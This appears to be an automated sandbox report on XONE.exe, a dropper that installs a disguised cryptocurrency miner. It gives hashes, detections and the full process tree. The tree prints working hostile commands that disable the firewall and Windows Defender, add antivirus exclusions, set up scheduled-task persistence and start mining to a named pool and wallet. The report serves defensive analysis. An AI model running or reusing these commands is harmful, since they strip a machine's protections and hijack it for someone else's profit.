Analysis
-
max time kernel
600s -
max time network
602s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
01-07-2024 17:14
Behavioral task
behavioral1
Sample
XONE.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
XONE.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
XONE.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral4
Sample
XONE.exe
Resource
win11-20240611-en
Behavioral task
behavioral5
Sample
XONE.pyc
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
XONE.pyc
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
XONE.pyc
Resource
win10v2004-20240226-en
Behavioral task
behavioral8
Sample
XONE.pyc
Resource
win11-20240611-en
General
-
Target
XONE.exe
-
Size
38.0MB
-
MD5
747325288a489b3c6863573f3e72104b
-
SHA1
14e39695af5942d151c008b813580160604d85e3
-
SHA256
7bfb4db002139d04fcf233d3384ba2c15c14e01d69d26327dc7ed918731b6194
-
SHA512
0258556daf1368dd58c651df6a4fd5e028a5217282a47a63b2fbbf08e20588cab57ca578e5e288868ed00ef30de2e5a43ca099aef7431d7dcac5b5d4c5436463
-
SSDEEP
786432:xy4byV7+uCOd9dFtuAJ1vyskeQ6T7tHckEz5lgYmErmRA+RlnS+kktWW8jz:xy4byV7+u5IATvJkb6PqL5ltm55NltWW
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Task Host = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Task Host = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0" reg.exe -
XMRig Miner payload 45 IoCs
Processes:
resource yara_rule behavioral2/memory/4356-2548-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2549-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2550-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2551-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2552-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2553-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2554-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2555-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2556-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2557-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2558-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2559-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2560-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2561-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2562-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2563-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2564-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2565-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2566-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2567-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2568-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2569-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2570-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2571-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2572-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2573-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2574-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2575-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2576-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2577-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2578-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2579-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2580-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2581-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2582-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2583-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2584-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2585-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2586-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2587-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2588-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2589-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2590-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2591-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig behavioral2/memory/4356-2592-0x00007FF627C60000-0x00007FF62875E000-memory.dmp xmrig -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 412 netsh.exe 1628 netsh.exe -
Executes dropped EXE 16 IoCs
Processes:
updater_main.exeupdater_main.exeminer.exeab.exeac1.exeu.exeu.exed.exeac.exec1.exeStart.exed.exesvchost.exesvchost.exeWindows Protection.exeWindows Process.exepid process 3560 updater_main.exe 704 updater_main.exe 4328 miner.exe 2600 ab.exe 4856 ac1.exe 4808 u.exe 3948 u.exe 824 d.exe 3308 ac.exe 360 c1.exe 4076 Start.exe 3068 d.exe 6132 svchost.exe 3092 svchost.exe 4356 Windows Protection.exe 3004 Windows Process.exe -
Loads dropped DLL 18 IoCs
Processes:
XONE.exeupdater_main.exepid process 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 3084 XONE.exe 704 updater_main.exe 704 updater_main.exe 704 updater_main.exe 704 updater_main.exe -
Processes:
resource yara_rule C:\ProgramData\Defender\Windows Process.exe vmprotect behavioral2/memory/3004-2544-0x0000000140000000-0x0000000141B39000-memory.dmp vmprotect -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\miner.exe autoit_exe C:\ProgramData\Defender\c1.exe autoit_exe -
Drops file in System32 directory 13 IoCs
Processes:
u.exeu.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File created C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI u.exe File created C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy\User\Registry.pol u.exe File opened for modification C:\Windows\System32\GroupPolicy u.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini u.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Windows Process.exepid process 3004 Windows Process.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\updater_main.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2888 timeout.exe -
Modifies registry class 4 IoCs
Processes:
ab.exeminer.execmd.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings ab.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings miner.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4256 schtasks.exe 6060 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWindows Process.exepid process 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 3004 Windows Process.exe 3004 Windows Process.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeWindows Protection.exedescription pid process Token: SeDebugPrivilege 4364 powershell.exe Token: SeLockMemoryPrivilege 4356 Windows Protection.exe Token: SeLockMemoryPrivilege 4356 Windows Protection.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Windows Protection.exepid process 4356 Windows Protection.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Windows Process.exepid process 3004 Windows Process.exe 3004 Windows Process.exe 3004 Windows Process.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XONE.exeXONE.execmd.exeupdater_main.exeupdater_main.execmd.exeminer.exeab.exeac1.exeWScript.execmd.exenet.exedescription pid process target process PID 1692 wrote to memory of 3084 1692 XONE.exe XONE.exe PID 1692 wrote to memory of 3084 1692 XONE.exe XONE.exe PID 3084 wrote to memory of 1116 3084 XONE.exe cmd.exe PID 3084 wrote to memory of 1116 3084 XONE.exe cmd.exe PID 1116 wrote to memory of 3560 1116 cmd.exe updater_main.exe PID 1116 wrote to memory of 3560 1116 cmd.exe updater_main.exe PID 3560 wrote to memory of 704 3560 updater_main.exe updater_main.exe PID 3560 wrote to memory of 704 3560 updater_main.exe updater_main.exe PID 704 wrote to memory of 3312 704 updater_main.exe cmd.exe PID 704 wrote to memory of 3312 704 updater_main.exe cmd.exe PID 3312 wrote to memory of 4328 3312 cmd.exe miner.exe PID 3312 wrote to memory of 4328 3312 cmd.exe miner.exe PID 3312 wrote to memory of 4328 3312 cmd.exe miner.exe PID 4328 wrote to memory of 2600 4328 miner.exe ab.exe PID 4328 wrote to memory of 2600 4328 miner.exe ab.exe PID 4328 wrote to memory of 2600 4328 miner.exe ab.exe PID 2600 wrote to memory of 1284 2600 ab.exe WScript.exe PID 2600 wrote to memory of 1284 2600 ab.exe WScript.exe PID 2600 wrote to memory of 1284 2600 ab.exe WScript.exe PID 4328 wrote to memory of 4856 4328 miner.exe ac1.exe PID 4328 wrote to memory of 4856 4328 miner.exe ac1.exe PID 4328 wrote to memory of 4856 4328 miner.exe ac1.exe PID 4856 wrote to memory of 4808 4856 ac1.exe u.exe PID 4856 wrote to memory of 4808 4856 ac1.exe u.exe PID 4856 wrote to memory of 4808 4856 ac1.exe u.exe PID 4328 wrote to memory of 3948 4328 miner.exe u.exe PID 4328 wrote to memory of 3948 4328 miner.exe u.exe PID 4328 wrote to memory of 3948 4328 miner.exe u.exe PID 4328 wrote to memory of 1276 4328 miner.exe WScript.exe PID 4328 wrote to memory of 1276 4328 miner.exe WScript.exe PID 4328 wrote to memory of 1276 4328 miner.exe WScript.exe PID 1276 wrote to memory of 824 1276 WScript.exe d.exe PID 1276 wrote to memory of 824 1276 WScript.exe d.exe PID 1276 wrote to memory of 4872 1276 WScript.exe cmd.exe PID 1276 wrote to memory of 4872 1276 WScript.exe cmd.exe PID 1276 wrote to memory of 4872 1276 WScript.exe cmd.exe PID 4872 wrote to memory of 412 4872 cmd.exe netsh.exe PID 4872 wrote to memory of 412 4872 cmd.exe netsh.exe PID 4872 wrote to memory of 412 4872 cmd.exe netsh.exe PID 4328 wrote to memory of 3308 4328 miner.exe ac.exe PID 4328 wrote to memory of 3308 4328 miner.exe ac.exe PID 4328 wrote to memory of 3308 4328 miner.exe ac.exe PID 4872 wrote to memory of 5096 4872 cmd.exe net.exe PID 4872 wrote to memory of 5096 4872 cmd.exe net.exe PID 4872 wrote to memory of 5096 4872 cmd.exe net.exe PID 5096 wrote to memory of 4580 5096 net.exe net1.exe PID 5096 wrote to memory of 4580 5096 net.exe net1.exe PID 5096 wrote to memory of 4580 5096 net.exe net1.exe PID 4872 wrote to memory of 2840 4872 cmd.exe reg.exe PID 4872 wrote to memory of 2840 4872 cmd.exe reg.exe PID 4872 wrote to memory of 2840 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3740 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3740 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3740 4872 cmd.exe reg.exe PID 4872 wrote to memory of 4252 4872 cmd.exe reg.exe PID 4872 wrote to memory of 4252 4872 cmd.exe reg.exe PID 4872 wrote to memory of 4252 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3952 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3952 4872 cmd.exe reg.exe PID 4872 wrote to memory of 3952 4872 cmd.exe reg.exe PID 4872 wrote to memory of 1824 4872 cmd.exe reg.exe PID 4872 wrote to memory of 1824 4872 cmd.exe reg.exe PID 4872 wrote to memory of 1824 4872 cmd.exe reg.exe PID 4872 wrote to memory of 4256 4872 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XONE.exe"C:\Users\Admin\AppData\Local\Temp\XONE.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XONE.exe"C:\Users\Admin\AppData\Local\Temp\XONE.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\\Admin\Documents\updater_main.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\updater_main.exeC:\Users\\Admin\Documents\updater_main.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\updater_main.exeC:\Users\\Admin\Documents\updater_main.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\\miner.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\miner.exeC:\\miner.exe7⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA8⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"9⤵
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"8⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\net.exenet stop windefend10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend11⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f10⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f10⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f10⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f10⤵
- Scheduled Task/Job: Scheduled Task
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA8⤵
- Executes dropped EXE
-
C:\ProgramData\Defender\c1.exe"C:\ProgramData\Defender\c1.exe"9⤵
- Executes dropped EXE
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe10⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FE17.tmp\FE18.tmp\FE19.bat C:\ProgramData\Defender\Start.exe"11⤵
- Modifies registry class
-
C:\Windows\system32\timeout.exeTIMEOUT /t 1012⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps114⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g03dizuc\g03dizuc.cmdline"15⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28EF.tmp" "c:\Users\Admin\AppData\Local\Temp\g03dizuc\CSCC0C77072F80F4B00BDDADDAF8969A8C.TMP"16⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"15⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k16⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"13⤵
- Executes dropped EXE
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"12⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"8⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "9⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\net.exenet stop windefend10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend11⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f10⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f10⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f10⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f10⤵
- Scheduled Task/Job: Scheduled Task
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Defender\Windows Process.exeFilesize
11.1MB
MD5b09498b7a5e6794d2fab7827e5544de4
SHA10a39e5696cb90d4f7c44c6220da3f0897d6b5938
SHA2569532f18b0f78901cda83b717f5543a0435b43ea23b968de992e27c5b8961415d
SHA5126c17712348f07710b79647e5322fa056aeaea327027e42dfed9e0c6283a2a7bdef6722c661ed56d68a55d7e516a7cb63040ac30d9d0f8469a3cb282605ff4ba2
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ac.exeFilesize
16.5MB
MD5f947c1c1296a4793dafbabba529252e2
SHA151927e8606ec8664a1e30e2cabbebee4b0160f2a
SHA256a68c00b5e362f6ecd1e7fe423f5ea633441ae00c784246c0f8dda15f7d1aa092
